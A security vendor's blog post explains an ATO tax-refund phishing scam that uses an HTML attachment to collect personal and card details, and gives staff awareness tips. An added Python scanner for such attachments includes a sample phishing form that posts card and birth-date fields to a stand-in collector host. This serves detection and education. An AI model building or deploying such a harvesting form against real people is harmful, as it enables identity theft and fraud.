Richard Price, 05 January 2016 10:43:15 AEDT

New Year, New Phishing ATO Email Scam

Cyber criminals have launched yet another phishing ATO email scam, which MailGuard has successfully identified and blocked.

In a similar vein to another recent ATO scam, it attempts to fool taxpayers into thinking they’re entitled to a tax refund, in the hope of stealing sensitive personal information.

Below is an example of the email you should look out for:

The email’s subject ‘You have received a tax refund’ is designed to immediately catch the reader’s attention, particularly after an expensive Christmas and holiday period when the promise of a rebate is likely to be most welcome.

As you can see, the email appears to be sent from the Australian Taxation Office, with an official header logo used to increase a sense of legitimacy.

This ATO email scam employs sophisticated social engineering techniques to prompt a rapid response from readers, claiming that failure to submit the correct details in time could lead to a delay in the rebate payment.

Unlike most phishing emails, which often contain grammatical errors, this tax refund scam is particularly well written, further strengthening its legitimacy.

The scammers encourage readers to download an HTML file contained within the body of the email, in order to complete a ‘Tax Refund Form’.

Once the reader has double-clicked on the file, it saves itself to a temporary directory on their computer before opening as a web page within an internet browser, as shown below.

By inviting users to access a web page through an HTML file, rather than through a direct URL link, cyber criminals are hoping to bypass spam filters which scan links in emails against a security vendor's URL blacklist.


As you can see, the cyber criminals have used a sophisticated website cloning application to create a direct replica of the ATO’s official website.

Closer inspection of the webpage URL should immediately warn readers that this page is illegitimate – it contains no reference to the Australian government, whose web addresses always end in

The form encourages readers to fill in a range of personal information, including their date of birth, full name and credit card details, which are then captured once the blue “Log on” button has been clicked.

More vigilant recipients would be wary of a website that asks them to “Log on” without asking for username or password credentials, something generally expected from a legitimate service.

Users are finally redirected to the official ATO website, giving the impression that the process has been completed successfully and legitimately. In the meantime, cyber criminals now have access to personal details used to steal a recipient’s identity and appropriate funds.
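Because the form arrives as an HTML attachment, link-reputation checks on the message body find nothing to look up, so a filter has to inspect the attachment itself. The following Python check is an added example, not MailGuard's code or part of the original post: it flags HTML attachments whose forms post sensitive-looking fields to a remote host. The keyword list, the `collector.example` host and the sample message are constructed assumptions.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed keyword list, modelled on the fields the article says the form requests.
SENSITIVE = ("card", "cvv", "expiry", "birth", "dob")

class FormAudit(HTMLParser):
    """Records remote form targets and sensitive-looking field names."""
    def __init__(self):
        super().__init__()
        self.remote_actions, self.sensitive_fields = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and urlparse(a.get("action", "")).scheme in ("http", "https"):
            self.remote_actions.append(a["action"])
        elif tag in ("input", "select", "textarea"):
            label = a.get("name") or a.get("id") or ""
            if any(word in label.lower() for word in SENSITIVE):
                self.sensitive_fields.append(label)

def scan_message(raw_bytes):
    """Return a finding for each HTML attachment that posts sensitive fields to a remote host."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not filename.lower().endswith((".html", ".htm")):
            continue
        audit = FormAudit()
        audit.feed(part.get_payload(decode=True).decode("utf-8", errors="replace"))
        if audit.remote_actions and audit.sensitive_fields:
            findings.append({"attachment": filename, "posts_to": audit.remote_actions,
                             "fields": audit.sensitive_fields})
    return findings

def build_sample():
    """Constructed sample: the body has no links; the form lives in the attachment."""
    m = EmailMessage()
    m["Subject"] = "You have received a tax refund"
    m.set_content("Please download and complete the attached Tax Refund Form.")
    page = ('<form action="https://collector.example/submit" method="post">'
            '<input name="full_name"><input name="date_of_birth">'
            '<input name="card_number"><button>Log on</button></form>')
    m.add_attachment(page, subtype="html", filename="Tax_Refund_Form.html")
    return m.as_bytes()
```

Calling `scan_message(build_sample())` returns one finding naming the attachment, the remote form target and the two sensitive fields; a message without HTML attachments returns an empty list.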

Protecting yourself from phishing emails

Protection against phishing emails like this tax refund scam requires a two-tier approach: firstly through prevention, and secondly through education.

The most important protection measure is to ensure that phishing emails don’t reach you in the first place. A premium cloud email filter will scan your emails against a range of spam criteria, detecting and blocking campaigns like this tax refund scam before they reach you.

Because cloud-based email filters can be updated immediately, without having to download a patch, you’ll be protected against new varieties of phishing scams, and the use of new techniques, in real time.

The second step is through education, so it’s important that you encourage staff not to open emails that:

  • Appear to be sent from a reputable firm, but are not addressed to you by name
  • Include a call to action that urges you to act quickly
  • Ask you to enter personal information that they should already have access to, particularly when the site looks suspicious
  • Take you to a landing page with an unofficial-looking URL

Please be aware that the ATO will not send emails asking you to submit personal details - you should call them directly if you are unsure of the legitimacy of any of their communications. We recommend that you share our blog with staff members in order to educate them on how to look out for an attack.

Keep up to date on the latest email scams by subscribing to MailGuard’s weekly update or following us on social media.
